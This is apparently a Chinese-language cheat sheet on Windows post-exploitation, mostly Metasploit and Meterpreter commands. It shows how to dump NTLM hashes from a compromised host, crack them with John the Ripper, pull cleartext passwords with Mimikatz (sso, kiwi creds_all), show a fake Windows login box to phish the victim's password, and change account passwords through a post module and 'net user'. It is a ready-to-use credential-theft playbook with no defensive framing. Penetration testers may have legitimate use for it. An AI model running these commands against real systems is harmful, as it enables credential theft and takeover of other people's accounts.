windows后渗透利用

获取 hash

meterpreter

1
$ meterpreter > hashdump

将 hash 值保存到文件中,然后用 john 破解:

1
john --wordlist=/root/Desktop/pass.txt --format=NT /root/Desktop/hashes.txt

hashdump

1
2
3
$ msf > use post/windows/gather/hashdump
$ msf post(hashdump) > set session 2
$ msf post(hashdump) > exploit

smart_hashdump

1
2
3
$ msf > use post/windows/gather/smart_hashdump
$ msf post(hashdump) > set session 2
$ msf post(hashdump) > exploit

credential_collector

1
2
3
$ msf > use post/windows/gather/credentials/credential_collector
$ msf post(credential_collector) > set session 2
$ msf post(credential_collector) > exploit

上面 4 种得到的都是 hash,需要破解,下面看看怎么直接得到明文密码。

获取明文密码

sso 模块

实际上这一功能利用的是 Mimikatz 扩展。

1
2
3
msf > use post/windows/gather/credentials/sso
msf post(sso) > set session 2
msf post(sso) > exploit

meterpreter kiwi

这也是用的 Mimikatz

1
2
meterpreter > load kiwi
meterpreter > creds_all

伪造登录框

1
2
3
msf > use post/windows/gather/phish_windows_credentials
msf post(phish_windows_credentials) > set session 2
msf post(phish_windows_credentials) > exploit

这时候会伪造假冒的登录框,对方输入密码之后我们就可以得到了。

更改目标密码

change_password

这种主要适用于你创建了一个新账号,但是对方账号策略强制在登录之前必须修改密码,否则你登录会报错:’System error 1907 has occurred’。

1
2
3
4
5
6
msf > use post/windows/manage/change_password
msf post(change_password) > set smbuser raj
msf post(change_password) > set old_password 123
msf post(change_password) > set new_password 987
msf post(change_password) > set session 1
msf post(change_password) > exploit

net user

1
2
3
meterepreter> shell
net user
net user raj 123